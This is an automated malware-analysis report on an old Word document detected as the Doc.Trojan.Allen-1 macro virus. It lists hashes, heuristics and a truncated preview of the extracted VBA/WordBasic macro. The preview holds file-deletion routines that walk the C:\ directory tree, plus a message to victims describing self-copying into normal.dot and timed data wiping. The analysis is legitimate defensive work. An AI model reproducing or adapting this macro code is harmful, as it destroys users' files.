Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 23de53890ce5c006…

MALICIOUS

Office (OLE)

48.0 KB Created: 1998-04-01 08:09:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 81d82c02f5456e75956849552343bd13 SHA-1: bfedb8cef4056e21cc211e8ea82f9cdfc3054003 SHA-256: 23de53890ce5c006510a144ec7ec63dbb4acf4614be2f69efd65fe2dc09753d7
220 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample contains legacy WordBasic macro markers and a large VBA macro, indicating a malicious document. The ClamAV detection 'Doc.Trojan.Allen-1' strongly suggests a known malware family. The macro code, though truncated, contains logic for deleting files across the C:\ drive, including within Windows and Winword directories, suggesting a destructive intent.

Heuristics 4

  • ClamAV: Doc.Trojan.Allen-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Allen-1
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 27271 bytes
SHA-256: 2a0cfef04e97cf3f680cfa2bf0d69b754233f2f6b137fa462699ca7fda76671a
Detection
ClamAV: Doc.Trojan.Allen-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "RpAE"

Public Sub MAIN()
Dim pukul$
Dim hari
Dim tgl
Dim bulan
Dim tahun
Dim hari_$
Dim bulan_$
Dim tgl_$
Dim tahun_$
Dim Semua$
Dim Bacalah$
'tgl = Day(Now())
'jam = Hour(Now())
'If tgl < 20 Then Goto Selamat
'If jam < 11 Then Goto Selamat
'Dim Sehat$(20)
'Dim Subur$(20)
'ChDir "C:\"
'Dim subdirs$(CountDirectories())
'subdirs$(0) = "[..]"
'For i = 1 To CountDirectories()
'   Print "Reading menu...Please wait !"
'   Subdirs$(i) = UCase$(GetDirectory$(i))
'   If Subdirs$(i) = "WINDOWS" Then Goto lewat
'   If Subdirs$(i) = "WINWORD" Then Goto lewat
'   If Subdirs$(i) = "WINWORD6" Then Goto lewat
'   Ojek$ = "C:\" + Subdirs$(i) + "\*.*"
'   Kill ojek$
'   ChDir  Subdirs$(i)
'       Subur$(0) = "[..]"
'       For a = 1 To CountDirectories()
'           Print "Reading menu...Please wait !"
'           subur$(a) = UCase$(GetDirectory$(a))
'           If subur$(a) = "WINWORD" Then Goto pass
'           If subur$(a) = " WINWORD6" Then Goto pass
'           Penyakit$ = "C:\" + subdirs$(i) + "\" + subur$(a) + "\*.*"
'           Kill Penyakit$
'   ChDir subur$(a)
'       sehat$(0) = "[..]"
'               For b = 1 To CountDirectories()
'               Print "Reading menu...Please wait !"
'               sehat$(b) = UCase$(GetDirectory$(b))
'               Tien$ = "C:\" + Subdirs$(i) + "\" + Subur$(a) + "\" + 'Sehat$(b) + "\*.*"
'           Kill Tien$
'           Next b
'           ChDir "C:\" + subdirs$(i)
'PASS:
'       Next a
'       ChDir "C:\"
'lewat:
'Next i
pukul$ = WordBasic.[Time$](WordBasic.Now())
hari = WordBasic.WeekDay(WordBasic.Now())
tgl = WordBasic.Day(WordBasic.Now())
bulan = WordBasic.Month(WordBasic.Now())
tahun = WordBasic.Year(WordBasic.Now())
ReDim hari___$(7)
ReDim bulan___$(12)
If hari = 1 Then hari_$ = "Minggu"
If hari = 2 Then hari_$ = "Senin"
If hari = 3 Then hari_$ = "Selasa"
If hari = 4 Then hari_$ = "Rabu"
If hari = 5 Then hari_$ = "Kamis"
If hari = 6 Then hari_$ = "Jumat"
If hari = 7 Then hari_$ = "Sabtu"
If bulan = 1 Then bulan_$ = "Januari"
If bulan = 2 Then bulan_$ = "Februari"
If bulan = 3 Then bulan_$ = "Maret"
If bulan = 4 Then bulan_$ = "April"
If bulan = 5 Then bulan_$ = "Mei"
If bulan = 6 Then bulan_$ = "Juni"
If bulan = 7 Then bulan_$ = "Juli"
If bulan = 8 Then bulan_$ = "Agustus"
If bulan = 9 Then bulan_$ = "September"
If bulan = 10 Then bulan_$ = "Oktober"
If bulan = 11 Then bulan_$ = "November"
If bulan = 12 Then bulan_$ = "Desember"
tgl_$ = Str(tgl)
tahun_$ = Str(tahun)
Semua$ = hari_$ + ", " + tgl_$ + " " + bulan_$ + " " + tahun_$ + ", Jam :" + pukul$ + "."
'Pesan$ = "Anda rupanya sedang sial, semua file di mesin ini kecuali yang berada di direktori WINDOWS dan WINWORD telah hilang, jangan kaget, ini bukan ulah Anda, tapi ini hasil pekerjaan saya...Barang siapa yang berhasil menemukan cara menangkal virus ini
', saya aka" + "n memberi listing virus ini untuk Anda !!! Dan tentu saja saya akan terus datang kesini untuk memberi Anda salam dengan virus-virus terbaru dari saya...selamat !   Bandung, " + semua$
Bacalah$ = "Assalamualaikum ..., maaf @Rapi.Kom mengganggu anda sebentar. Pesan ini aslinya bernama  PESAN.TXT  yang  muncul  di  root direktori  setelah  anda menjalankan Winword 6.0 yang templatenya (normal.dot)  telah  tertulari  macro  menjijikkan ini. Macro ini " + "(sebe" + "lum @R" + "a" + "pi" + ".Kom modifikasi)  berasal  dari  file data Winword 6.0 (*.doc) yang telah tertular macro ini. Bila file data tersebut  di pangggil (Open doc), maka macro secara otomatis menjalankan perintah-perintah macro lain nya,  yang antara  lain mengcopykan  diri ke" + " gl" + "o" + "bal " + "template (normal.dot), juga pada tanggal dan jam tertentu akan menghapus semua data di direktori tingkat 1, 2 dan 3 (kecuali Hidden direkto
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.